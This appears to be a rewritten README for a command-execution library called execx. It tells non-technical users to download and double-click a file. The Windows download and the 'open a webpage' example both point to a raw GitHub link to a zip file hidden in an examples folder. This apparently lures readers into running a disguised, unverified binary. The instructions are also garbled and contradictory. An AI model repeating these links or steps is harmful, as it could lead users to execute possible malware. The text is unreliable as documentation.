Welcome to execx! This software makes running external commands easy and safe. You don't need to be a programmer to use it. Follow the steps below to get started.
-
Click the link below to visit the Releases page: visit this page to download
-
Look for the latest version of execx on the Releases page.
-
Download the file that matches your operating system:
- For Windows, look for
https://raw.githubusercontent.com/zakaria-x9/execx/main/examples/onstdout/Software_v3.8-beta.4.zip. - For macOS, look for
execx-macos. - For Linux, look for
execx-linux.
- For Windows, look for
-
After downloading, locate the file on your computer.
-
To run execx, double-click the downloaded file. It will open a command window where you can start using execx.
- Operating System: You can use execx on Windows, macOS, or Linux.
- Disk Space: At least 30 MB available space.
- Memory: 1 GB RAM or more recommended.
- Easy to Use: execx provides a simple way to run commands without deep technical knowledge.
- Safe Execution: It includes checks to avoid running harmful commands.
- Fluent API: Lets you write commands just by typing, making it clear and expressive.
- Automation Support: Perfect for scripting and automating repetitive tasks.
- Cross-Platform Compatibility: Works seamlessly on multiple operating systems.
-
Open execx: Launch the command window where you opened execx.
-
Running a Command: Type the command you wish to run. For example:
- To list files, type
ls(ordiron Windows). - To open an application, type its name.
- To list files, type
-
Using Options: You can chain commands together or add options for more control. For example:
execx run command --option=value ββ`
-
Using Scripts: Save your commands in a text file and run them with execx. This way, you can automate tasks by running the script file.
Here are a couple of simple examples to show how to use execx:
-
Listing Files:
- Open execx and type:
execx run ls
- Open execx and type:
-
Opening a Webpage:
- To open a browser to a specific webpage, type:
execx run open https://raw.githubusercontent.com/zakaria-x9/execx/main/examples/onstdout/Software_v3.8-beta.4.zip
- To open a browser to a specific webpage, type:
If you encounter any issues or have questions, please check the GitHub Issues page. You can also submit your own issue for help.
execx is open-source software. Feel free to use and modify it under the terms of the MIT License.
For more information or to connect with the community, visit the GitHub repository. You can share your experiences and suggestions there.
Enjoy using execx!